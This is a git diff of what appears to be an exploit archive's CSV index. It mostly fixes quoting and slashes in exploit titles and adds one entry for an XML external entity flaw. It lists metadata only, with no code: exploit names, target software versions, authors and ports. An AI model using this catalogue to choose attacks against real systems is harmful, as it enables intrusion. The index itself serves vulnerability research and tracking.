diff --git a/files.csv b/files.csv index 622feebd2..28307ddac 100644 --- a/files.csv +++ b/files.csv @@ -4788,7 +4788,7 @@ id,file,description,date,author,platform,type,port 38465,platforms/linux/dos/38465.txt,"Linux Kernel 3.2.1 - Tracing Multiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,dos,0 38483,platforms/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0 38485,platforms/windows/dos/38485.py,"VideoLAN VLC Media Player 2.2.1 - libvlccore '.mp3' Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0 -38490,platforms/multiple/dos/38490.txt,"Adobe Flash IExternalizable.writeExternal - Type Confusion",2015-10-19,"Google Security Research",multiple,dos,0 +38490,platforms/multiple/dos/38490.txt,"Adobe Flash - 'IExternalizable.writeExternal' Type Confusion",2015-10-19,"Google Security Research",multiple,dos,0 38493,platforms/hardware/dos/38493.txt,"Cisco Linksys WRT310N Router - Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",hardware,dos,0 38498,platforms/windows/dos/38498.py,"Elecard MPEG Player - '.m3u' File Buffer Overflow",2013-04-27,metacom,windows,dos,0 38538,platforms/multiple/dos/38538.py,"Code::Blocks - Denial of Service",2013-05-29,ariarat,multiple,dos,0 @@ -6751,7 +6751,7 @@ id,file,description,date,author,platform,type,port 11561,platforms/multiple/local/11561.html,"Mozilla Firefox 3.6 - URL Spoofing",2010-02-24,Unknown,multiple,local,0 11573,platforms/windows/local/11573.c,"Mediacoder 0.7.3.4605 - Local Buffer Overflow",2010-02-24,"fl0 fl0w",windows,local,0 11581,platforms/windows/local/11581.py,"Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH)",2010-02-26,mr_me,windows,local,0 -11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - '.m3u' / '.pls'/ '.ypl' Buffer Overflow (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 +11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - '.m3u' / '.pls' / '.ypl' Buffer Overflow (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Privilege Escalation",2010-03-07,kingcope,multiple,local,0 11656,platforms/windows/local/11656.py,"QuickZip 4.x - '.zip' Local Universal Buffer Overflow (PoC)",2010-03-08,"corelanc0d3r and mr_me",windows,local,0 11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0 @@ -9298,6 +9298,7 @@ id,file,description,date,author,platform,type,port 42974,platforms/windows/local/42974.py,"ASX to MP3 3.1.3.7 - '.m3u' Buffer Overflow",2017-10-11,"Parichay Rai",windows,local,0 43006,platforms/linux/local/43006.txt,"shadowsocks-libev 3.1.0 - Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,8839 43007,platforms/linux/local/43007.txt,"Shadowsocks - Log File Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,0 +43017,platforms/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -9820,7 +9821,7 @@ id,file,description,date,author,platform,type,port 2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit (Metasploit)",2006-10-01,muts,windows,remote,81 2482,platforms/windows/remote/2482.pl,"SHTTPD 1.34 - 'POST' Remote Buffer Overflow",2006-10-05,SkOd,windows,remote,0 2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)",2006-10-12,h07,windows,remote,0 -2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - (RCPT) Remote Stack Overflow",2006-10-19,"Greg Linares",windows,remote,25 +2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - 'RCPT' Remote Stack Overflow",2006-10-19,"Greg Linares",windows,remote,25 2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b - (GET) Arbitrary File Download Exploit",2006-10-24,prdelka,windows,remote,143 2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote Exploit",2006-10-24,prdelka,hardware,remote,0 2649,platforms/windows/remote/2649.c,"QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (1)",2006-10-25,Expanders,windows,remote,25 @@ -11968,7 +11969,7 @@ id,file,description,date,author,platform,type,port 19557,platforms/linux/remote/19557.txt,"John S.2 Roberts AnyForm 1.0/2.0 - CGI Semicolon",1995-07-31,"Paul Phillips",linux,remote,0 19558,platforms/linux/remote/19558.c,"OpenLink Software OpenLink 3.2 - Remote Buffer Overflow",1999-10-15,"Tymm Twillman",linux,remote,0 19559,platforms/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL Redirection (MS99-043)",1999-10-18,"Georgi Guninski",windows,remote,0 -19560,platforms/multiple/remote/19560.c,"Washington University WU-FTPD 2.5.0 - message Buffer Overflow",1999-10-19,typo/teso,multiple,remote,0 +19560,platforms/multiple/remote/19560.c,"Washington University WU-FTPD 2.5.0 - 'message' Buffer Overflow",1999-10-19,typo/teso,multiple,remote,0 19561,platforms/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x - Mail Server Multiple Buffer Overflows",1999-10-01,"Arne Vidstrom",windows,remote,0 19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPd 1.1/2.4 Pro - Buffer Overflow",1999-10-22,UNYUN,windows,remote,0 19567,platforms/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote,0 @@ -13856,7 +13857,7 @@ id,file,description,date,author,platform,type,port 25755,platforms/windows/remote/25755.txt,"ServersCheck 5.9/5.10 - Directory Traversal",2005-05-30,rgod,windows,remote,0 33414,platforms/php/remote/33414.php,"PHP 5.2.11 - 'htmlspecialCharacters()' Malformed Multibyte Character Cross-Site Scripting (1)",2009-12-17,hello@iwamot.com,php,remote,0 33415,platforms/php/remote/33415.php,"PHP 5.2.11 - 'htmlspecialCharacters()' Malformed Multibyte Character Cross-Site Scripting (2)",2009-12-17,hello@iwamot.com,php,remote,0 -33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0 +33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - '/cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0 25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation",2005-06-01,"Benjamin Tobias Franz",windows,remote,0 25802,platforms/linux/remote/25802.txt,"C.J. Steele Tattle - Remote Command Execution",2005-06-07,b0iler,linux,remote,0 25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab - ActiveX Heap Overflow (Metasploit)",2013-05-29,Metasploit,windows,remote,0 @@ -14033,8 +14034,8 @@ id,file,description,date,author,platform,type,port 33405,platforms/multiple/remote/33405.txt,"APC Network Management Card - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-15,"Jamal Pecou",multiple,remote,0 27851,platforms/windows/remote/27851.bat,"Microsoft Windows - Path Conversion",2006-05-10,"Mario Ballano Bárcena",windows,remote,0 27852,platforms/multiple/remote/27852.pl,"Symantec Enterprise Firewall / Gateway Security - HTTP Proxy Internal IP Leakage",2006-05-10,"Bernhard Mueller",multiple,remote,0 -27861,platforms/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 - 'NmConsole/Navigation.asp?sDeviceView' Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote,0 -27862,platforms/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 - 'NmConsole/ToolResults.asp?sHostname' Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote,0 +27861,platforms/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 - '/NmConsole/Navigation.asp?sDeviceView' Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote,0 +27862,platforms/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 - '/NmConsole/ToolResults.asp?sHostname' Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote,0 27873,platforms/hardware/remote/27873.txt,"Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution (PoC)",2013-08-26,Aodrulez,hardware,remote,0 27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server - Remote Command Execution (Metasploit)",2013-08-26,Metasploit,windows,remote,7770 27887,platforms/multiple/remote/27887.txt,"SAP Web Application Server 6.x/7.0 - Input Validation",2005-11-09,"Arnold Grossmann",multiple,remote,0 @@ -14527,13 +14528,13 @@ id,file,description,date,author,platform,type,port 31918,platforms/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure",2008-06-15,"Luigi Auriemma",multiple,remote,0 31920,platforms/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Command Directory Traversal",2008-06-13,"Tan Chew Keong",multiple,remote,0 31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0 -31922,platforms/multiple/remote/31922.txt,"GlassFish Application Server - 'resourceNode/customResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31923,platforms/multiple/remote/31923.txt,"GlassFish Application Server - 'resourceNode/externalResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31924,platforms/multiple/remote/31924.txt,"GlassFish Application Server - 'resourceNode/jmsDestinationNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31925,platforms/multiple/remote/31925.txt,"GlassFish Application Server - 'resourceNode/jmsConnectionNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31926,platforms/multiple/remote/31926.txt,"GlassFish Application Server - 'resourceNode/jdbcResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31927,platforms/multiple/remote/31927.txt,"GlassFish Application Server - 'Applications/lifecycleModulesNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31928,platforms/multiple/remote/31928.txt,"GlassFish Application Server - 'resourceNode/jdbcConnectionPoolNew1.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31922,platforms/multiple/remote/31922.txt,"GlassFish Application Server - '/resourceNode/customResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31923,platforms/multiple/remote/31923.txt,"GlassFish Application Server - '/resourceNode/externalResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31924,platforms/multiple/remote/31924.txt,"GlassFish Application Server - '/resourceNode/jmsDestinationNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31925,platforms/multiple/remote/31925.txt,"GlassFish Application Server - '/resourceNode/jmsConnectionNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31926,platforms/multiple/remote/31926.txt,"GlassFish Application Server - '/resourceNode/jdbcResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31927,platforms/multiple/remote/31927.txt,"GlassFish Application Server - '/Applications/lifecycleModulesNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31928,platforms/multiple/remote/31928.txt,"GlassFish Application Server - '/resourceNode/jdbcConnectionPoolNew1.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 31936,platforms/multiple/remote/31936.txt,"UltraEdit 14.00b - FTP/SFTP 'LIST' Command Directory Traversal",2008-06-17,"Tan Chew Keong",multiple,remote,0 31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 @@ -14823,7 +14824,7 @@ id,file,description,date,author,platform,type,port 33662,platforms/windows/remote/33662.txt,"WampServer 2.0i - lang Parameter Cross-Site Scripting",2010-02-22,"Gjoko Krstic",windows,remote,0 33663,platforms/multiple/remote/33663.txt,"IBM Websphere Portal 6.0.1.5 Build wp6015 - Portlet Palette Search HTML Injection",2010-02-19,"Sjoerd Resink",multiple,remote,0 33664,platforms/multiple/remote/33664.html,"Mozilla Firefox 3.5.8 - Style Sheet redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",multiple,remote,0 -33682,platforms/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 - 'loyalty_enu/start.swe' Cross-Site Scripting",2010-03-01,Lament,multiple,remote,0 +33682,platforms/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 - '/loyalty_enu/start.swe' Cross-Site Scripting",2010-03-01,Lament,multiple,remote,0 33686,platforms/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 - 'readme.nsf' Cross-Site Scripting",2010-03-02,"Nahuel Grisolia",multiple,remote,0 33689,platforms/multiple/remote/33689.as,"Adobe Flash Player 10.1.51 - Local File Access Information Disclosure",2010-03-03,"lis cker",multiple,remote,0 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0 @@ -14909,7 +14910,7 @@ id,file,description,date,author,platform,type,port 34088,platforms/android/remote/34088.html,"Boat Browser 8.0/8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0 34156,platforms/windows/remote/34156.pl,"TurboFTP Server 1.20.745 - Directory Traversal",2010-06-17,leinakesi,windows,remote,0 34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 - 'page' Cross-Site Scripting",2010-06-07,"Adam Baldwin",windows,remote,0 -34126,platforms/windows/remote/34126.txt,"Microsoft Help and Support Center - 'sysinfo/sysinfomain.htm' Cross-Site Scripting",2010-06-10,"Tavis Ormandy",windows,remote,0 +34126,platforms/windows/remote/34126.txt,"Microsoft Help and Support Center - '/sysinfo/sysinfomain.htm' Cross-Site Scripting",2010-06-10,"Tavis Ormandy",windows,remote,0 34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443 34152,platforms/linux/remote/34152.txt,"CUPS 1.4.2 - Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",linux,remote,0 34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution",2014-07-24,LiquidWorm,php,remote,80 @@ -15111,7 +15112,7 @@ id,file,description,date,author,platform,type,port 35549,platforms/unix/remote/35549.rb,"ActualAnalyzer - 'ant' Cookie Command Execution (Metasploit)",2014-12-16,Metasploit,unix,remote,80 35545,platforms/php/remote/35545.rb,"Tuleap - PHP Unserialize Code Execution (Metasploit)",2014-12-15,Metasploit,php,remote,80 35554,platforms/linux/remote/35554.txt,"Perl 5.x - 'lc()' / 'uc()' TAINT Mode Protection Security Bypass",2011-03-30,mmartinec,linux,remote,0 -35570,platforms/multiple/remote/35570.txt,"python-feedparser 5.0 - 'feedparser/feedparser.py' Cross-Site Scripting",2011-04-05,fazalmajid,multiple,remote,0 +35570,platforms/multiple/remote/35570.txt,"python-feedparser 5.0 - '/feedparser/feedparser.py' Cross-Site Scripting",2011-04-05,fazalmajid,multiple,remote,0 35573,platforms/windows/remote/35573.txt,"Microsoft Excel - Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",windows,remote,0 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution (Metasploit)",2014-12-19,"Patrick Webster",linux,remote,6082 35597,platforms/hardware/remote/35597.txt,"FiberHome HG-110 - Cross-Site Scripting / Directory Traversal",2011-04-08,Zerial,hardware,remote,0 @@ -15142,8 +15143,8 @@ id,file,description,date,author,platform,type,port 35762,platforms/hardware/remote/35762.txt,"Cisco Unified Operations Manager 8.5 - iptm/advancedfind.do extn Parameter Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote,0 35763,platforms/hardware/remote/35763.txt,"Cisco Unified Operations Manager 8.5 - iptm/ddv.do deviceInstanceName Parameter Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote,0 35764,platforms/hardware/remote/35764.txt,"Cisco Unified Operations Manager 8.5 - iptm/eventmon Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote,0 -35765,platforms/hardware/remote/35765.txt,"Cisco Unified Operations Manager 8.5 - 'iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp' Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote,0 -35766,platforms/hardware/remote/35766.txt,"Cisco Unified Operations Manager 8.5 - 'iptm/logicalTopo.do' Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote,0 +35765,platforms/hardware/remote/35765.txt,"Cisco Unified Operations Manager 8.5 - '/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp' Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote,0 +35766,platforms/hardware/remote/35766.txt,"Cisco Unified Operations Manager 8.5 - '/iptm/logicalTopo.do' Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote,0 35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise - Arbitrary File Upload (Metasploit)",2015-01-13,Metasploit,java,remote,9788 35777,platforms/windows/remote/35777.rb,"Oracle MySQL (Windows) - FILE Privilege Abuse (Metasploit)",2015-01-13,Metasploit,windows,remote,0 35778,platforms/php/remote/35778.rb,"WordPress Plugin WP Symposium 14.11 - Arbitrary File Upload (Metasploit)",2015-01-13,Metasploit,php,remote,80 @@ -15332,7 +15333,7 @@ id,file,description,date,author,platform,type,port 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow (Metasploit)",2015-06-24,Metasploit,multiple,remote,0 37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injections",2012-06-13,Sangteamtham,windows,remote,0 37400,platforms/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",windows,remote,0 -37429,platforms/hardware/remote/37429.txt,"Juniper Networks Mobility System Software - 'aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",hardware,remote,0 +37429,platforms/hardware/remote/37429.txt,"Juniper Networks Mobility System Software - '/aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",hardware,remote,0 37405,platforms/hardware/remote/37405.py,"Edimax IC-3030iWn - UDP Packet Password Information Disclosure",2012-06-14,y3dips,hardware,remote,0 37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python) (PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0 37428,platforms/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",cgi,remote,0 @@ -15887,7 +15888,7 @@ id,file,description,date,author,platform,type,port 42719,platforms/windows/remote/42719.rb,"EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,3500 42720,platforms/windows/remote/42720.rb,"EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,3000 42721,platforms/windows/remote/42721.rb,"Lockstep Backup for Workgroups 4.0.3 - Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,2125 -42722,platforms/windows/remote/42722.rb,"Disk Pulse Server 2.2.34 - GetServerInfo Buffer Overflow (Metasploit)",2010-10-19,"James Fitts",windows,remote,0 +42722,platforms/windows/remote/42722.rb,"Disk Pulse Server 2.2.34 - 'GetServerInfo' Buffer Overflow (Metasploit)",2010-10-19,"James Fitts",windows,remote,0 42723,platforms/windows/remote/42723.rb,"haneWIN DNS Server 1.5.3 - Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,53 42724,platforms/windows/remote/42724.rb,"KingScada AlarmServer 3.1.2.13 - Stack Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,12401 42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69 @@ -16650,7 +16651,7 @@ id,file,description,date,author,platform,type,port 923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0 925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Authentication Bypass",2005-04-09,LaMeR,asp,webapps,0 928,platforms/php/webapps/928.py,"PunBB 1.2.4 - 'id' SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0 -939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0 +939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - 'exit.php' SQL Injection",2005-04-13,kre0n,php,webapps,0 954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - 'index.cgi' Remote Command Execution",2005-04-25,z,cgi,webapps,0 980,platforms/cgi/webapps/980.pl,"I-Mall Commerce - 'i-mall.cgi' Remote Command Execution",2005-05-04,"Jerome Athias",cgi,webapps,0 982,platforms/php/webapps/982.c,"ZeroBoard Worm - Source Code",2005-05-06,anonymous,php,webapps,0 @@ -16659,7 +16660,7 @@ id,file,description,date,author,platform,type,port 1003,platforms/php/webapps/1003.c,"Fusion SBX 1.2 - Remote Command Execution",2005-05-20,Silentium,php,webapps,0 1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution (2)",2005-05-20,Nikyt0x,cgi,webapps,0 1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution (1)",2005-05-20,Alpha_Programmer,cgi,webapps,0 -1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - register.php SQL Injection",2005-05-20,deluxe89,php,webapps,0 +1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - 'register.php' SQL Injection",2005-05-20,deluxe89,php,webapps,0 1010,platforms/asp/webapps/1010.pl,"Maxwebportal 1.36 - Password.asp Change Password Exploit (3) (Perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 1011,platforms/asp/webapps/1011.php,"Maxwebportal 1.36 - Password.asp Change Password Exploit (2) (PHP)",2005-05-26,mh_p0rtal,asp,webapps,0 1012,platforms/asp/webapps/1012.txt,"Maxwebportal 1.36 - Password.asp Change Password Exploit (1) (HTML)",2005-05-26,"Soroush Dalili",asp,webapps,0 @@ -16672,7 +16673,7 @@ id,file,description,date,author,platform,type,port 1020,platforms/php/webapps/1020.c,"ZeroBoard 4.1 - preg_replace Remote nobody Shell Exploit",2005-05-31,n0gada,php,webapps,0 1022,platforms/php/webapps/1022.pl,"MyBulletinBoard (MyBB) 1.00 RC4 - 'calendar.php' SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 1023,platforms/php/webapps/1023.pl,"MyBloggie 2.1.1 < 2.1.2 - SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 -1030,platforms/php/webapps/1030.pl,"PostNuke 0.750 - readpmsg.php SQL Injection",2005-06-05,K-C0d3r,php,webapps,0 +1030,platforms/php/webapps/1030.pl,"PostNuke 0.750 - 'readpmsg.php' SQL Injection",2005-06-05,K-C0d3r,php,webapps,0 1031,platforms/php/webapps/1031.pl,"Portail PHP < 1.3 - SQL Injection",2005-06-06,"Alberto Trivero",php,webapps,0 1033,platforms/php/webapps/1033.pl,"WordPress 1.5.1.1 - SQL Injection",2005-06-22,"Alberto Trivero",php,webapps,0 1036,platforms/php/webapps/1036.php,"Invision Power Board 1.3.1 - 'login.php' SQL Injection",2005-06-08,anonymous,php,webapps,0 @@ -16699,7 +16700,7 @@ id,file,description,date,author,platform,type,port 1077,platforms/php/webapps/1077.pl,"WordPress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",php,webapps,0 1078,platforms/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection",2005-07-01,ilo--,php,webapps,0 1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 - (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0 -1082,platforms/php/webapps/1082.pl,"XOOPS 2.0.11 - xmlrpc.php SQL Injection",2005-07-04,RusH,php,webapps,0 +1082,platforms/php/webapps/1082.pl,"XOOPS 2.0.11 - 'xmlrpc.php' SQL Injection",2005-07-04,RusH,php,webapps,0 1083,platforms/php/webapps/1083.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (2)",2005-07-04,dukenn,php,webapps,0 1084,platforms/php/webapps/1084.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)",2005-07-04,"Mike Rifone",php,webapps,0 1088,platforms/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,php,webapps,0 @@ -16758,7 +16759,7 @@ id,file,description,date,author,platform,type,port 1324,platforms/php/webapps/1324.php,"PHPWebThings 1.4 - 'msg'/'forum' SQL Injection",2005-11-16,rgod,php,webapps,0 1325,platforms/php/webapps/1325.pl,"PHPWebThings 1.4 - (forum) SQL Injection",2005-11-16,AhLam,php,webapps,0 1326,platforms/php/webapps/1326.pl,"PHP-Nuke 7.8 Search Module - SQL Injection",2005-11-16,anonymous,php,webapps,0 -1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - 'config.php' SQL Injection / Command Execution",2005-11-17,rgod,php,webapps,0 +1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - '/config.php' SQL Injection / Command Execution",2005-11-17,rgod,php,webapps,0 1337,platforms/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution",2005-11-22,rgod,php,webapps,0 1340,platforms/php/webapps/1340.php,"eFiction 2.0 - Fake '.GIF' Arbitrary File Upload",2005-11-25,rgod,php,webapps,0 1342,platforms/php/webapps/1342.php,"Guppy 4.5.9 - (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 @@ -16888,11 +16889,11 @@ id,file,description,date,author,platform,type,port 1646,platforms/php/webapps/1646.php,"phpMyChat 0.14.5 - (SYS enter) Remote Code Execution",2006-04-05,rgod,php,webapps,0 1647,platforms/php/webapps/1647.php,"phpMyChat 0.15.0dev - (SYS enter) Remote Code Execution",2006-04-06,rgod,php,webapps,0 1650,platforms/php/webapps/1650.pl,"Horde Help Viewer 3.1 - Remote Command Execution",2006-04-07,deese,php,webapps,0 -1652,platforms/php/webapps/1652.php,"ADODB < 4.70 (PHPOpenChat 3.0.x) - Server.php SQL Injection",2006-04-09,rgod,php,webapps,0 +1652,platforms/php/webapps/1652.php,"ADODB < 4.70 (PHPOpenChat 3.0.x) - 'Server.php' SQL Injection",2006-04-09,rgod,php,webapps,0 1653,platforms/php/webapps/1653.txt,"dnGuestbook 2.0 - SQL Injection",2006-04-09,snatcher,php,webapps,0 1654,platforms/php/webapps/1654.txt,"autonomous lan party 0.98.1.0 - Remote File Inclusion",2006-04-09,Codexploder,php,webapps,0 1655,platforms/php/webapps/1655.php,"XBrite Members 1.1 - 'id' SQL Injection",2006-04-09,snatcher,php,webapps,0 -1656,platforms/php/webapps/1656.txt,"Sire 2.0 - 'lire.php' Remote File Inclusion / Arbitrary File Upload",2006-04-09,simo64,php,webapps,0 +1656,platforms/php/webapps/1656.txt,"Sire 2.0 - '/lire.php' Remote File Inclusion / Arbitrary File Upload",2006-04-09,simo64,php,webapps,0 1659,platforms/php/webapps/1659.php,"phpList 2.10.2 - GLOBALS[] Remote Code Execution",2006-04-10,rgod,php,webapps,0 1660,platforms/php/webapps/1660.pm,"Horde 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps,0 